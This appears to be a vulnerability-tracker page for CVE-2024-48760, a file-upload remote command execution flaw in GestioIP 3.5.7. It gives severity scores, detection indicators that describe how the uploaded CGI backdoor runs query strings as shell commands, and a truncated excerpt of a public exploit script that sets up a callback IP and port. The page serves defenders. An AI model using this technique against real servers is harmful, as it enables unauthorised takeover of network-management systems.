CVE-2024-48760
published 2025-01-14CVE-2024-48760: An issue in GestioIP v3.5.7 allows a remote attacker to execute arbitrary code via the file upload function. The attacker can upload a malicious perlcmd.cgi…
PriorityP278critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
45.11%
98.6th percentile
An issue in GestioIP v3.5.7 allows a remote attacker to execute arbitrary code via the file upload function. The attacker can upload a malicious perlcmd.cgi file that overwrites the original upload.cgi file, enabling remote command execution.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gestioip | gestioip | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for HTTP POST requests to /gestioip/api/upload.cgi where the uploaded filename is 'upload.cgi' — this indicates the attacker is overwriting the upload handler with a backdoor. ↗
- →Detect HTTP GET requests to /gestioip/api/upload.cgi with a QUERY_STRING parameter — the backdoor executes the query string as a shell command, so any GET with a query string to this endpoint is suspicious post-compromise. ↗
- →Alert on the backdoor liveness check: HTTP GET to /gestioip/api/upload.cgi?whoami returning 'www-data' in the response body indicates the backdoor is active. ↗
- →The backdoor CGI script decodes URL-encoded shell metacharacters (%20, %3b, %7c, %27, %22, %5D, %5B) from QUERY_STRING before executing them — look for these encoded characters in GET requests to upload.cgi. ↗
- →The multipart POST upload uses form fields 'file_name' and 'leases_file' — a POST to upload.cgi with file_name value of 'upload.cgi' is a strong indicator of exploitation. ↗
- →If GestioIP is configured with no authentication for the admin account, the vulnerability is exploitable without credentials — monitor unauthenticated POSTs to /gestioip/api/upload.cgi. ↗
- ·Exploitation requires admin credentials unless GestioIP is configured with no authentication for the admin account, in which case no credentials are needed. ↗
- ·The vulnerability is specific to GestioIP version 3.5.7; verify the deployed version before applying detections. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
GestioIP 3.5.7 - Remote Command Execution (RCE)
exploitdb·2025-04-14·CVSS 9.8
CVE-2024-48760 [CRITICAL] GestioIP 3.5.7 - Remote Command Execution (RCE)
GestioIP 3.5.7 - Remote Command Execution (RCE)
---
# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-48760
import requests
import sys
# Config
username = "gipadmin"
password = "PASSWORD"
domain = "localhost"
local_ip = "10.20.0.1"
local_port = 443
target_url = f"http://{domain}/gestioip/api/upload.cgi"
# CGI Backdoor Perl
backdoor_code = """#!/usr/bin/perl -w
Metasploit
GestioIP 3.5.7 Remote Command Execution
metasploit
CVE-2024-48760 GestioIP 3.5.7 Remote Command Execution
GestioIP 3.5.7 Remote Command Execution
This module exploits a command execution via file upload. If GestioIP is configured to use no authentication for admin account, no password is required to exploit the vulnerability. Otherwise, an authenticated user with admin right on the web site is required to exploit.
2025-01-14
Published